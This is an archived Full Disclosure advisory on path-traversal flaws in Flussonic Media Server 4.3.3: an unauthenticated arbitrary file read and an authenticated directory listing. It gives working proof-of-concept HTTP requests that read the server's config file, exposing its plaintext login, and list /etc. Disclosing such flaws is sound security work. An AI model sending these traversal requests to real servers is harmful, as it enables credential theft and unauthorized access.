Full Disclosure mailing list archives

Flussonic Media Server 4.3.3 Multiple Vulnerabilities


From: Onur Alanbel <onur.a () windowslive com>
Date: Sun, 29 Jun 2014 22:56:22 +0300

Document Title:
============
Flussonic Media Server 4.3.3 Multiple Vulnerabilities

Release Date:
===========
June 29, 2014

Product & Service Introduction:
========================
Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, 
MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite 
TV and other multimedia servers (Wowza, Flash Media Server and Red5).

Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during 
parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data 
network.

Abstract Advisory Information:
=======================
BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media 
Server 4.3.3

Vulnerability Disclosure Timeline:
=========================
June 26, 2014    :    Contact with Vendor
June 26, 2014    :    Vendor Response
June 26, 2014    :    Version 4.3.4 Deployed
June 29, 2014    :    Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Erlyvideo, LLC
Product: Flussonic Media Server 4.1.25 - 4.3.3 

Exploitation Technique:
==================
AFR:    Remote, Unauthenticated
ADL:    Remote, Authenticated

Severity Level:
===========
High

Technical Details & Description:
========================
1. Arbitrary File Read (Unauthenticated)
It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET 
request. Flussonic’s web interface login information can be found as plaintext by reading 
/etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.

2. Arbitrary Directory Listing (Authenticated)
It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the 
parameter “subpath=directory”. 


Proof of Concept (PoC):
==================
Proof of Concept AFR Request & Response:

GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 09:50:57 GMT
Content-Length: 191
Content-Type: text/plain
Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687

# Default ports Flussonic M1 Media server listens on
http 80;
http 8080;
rtmp 1935;
rtsp 554;
pulsedb /var/run/flussonic;
edit_auth flussonic letmein!;

live mylive;

file vod {
path priv;
}

2. Proof of Concept ADR Request & Response:

GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
Connection: keep-alive

HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 11:04:12 GMT
Content-Length: 7555
X-Route-Time: 28
X-Run-Time: 8090
Content-Type: application/json

{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
………
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}


Solution Fix & Patch:
================
Update version 4.3.4

Security Risk:
==========
The risk of the vulnerabilities above estimated as high and medium.

Credits & Authors:
==============
Bilgi Güvenliği Akademisi

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages.
            
Domain:        http://bga.com.tr/advisories.html
Social:           http://twitter.com/bgasecurity
Contact:        bilgi () bga com tr
    
Copyright © 2014 | BGA
                                          

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread: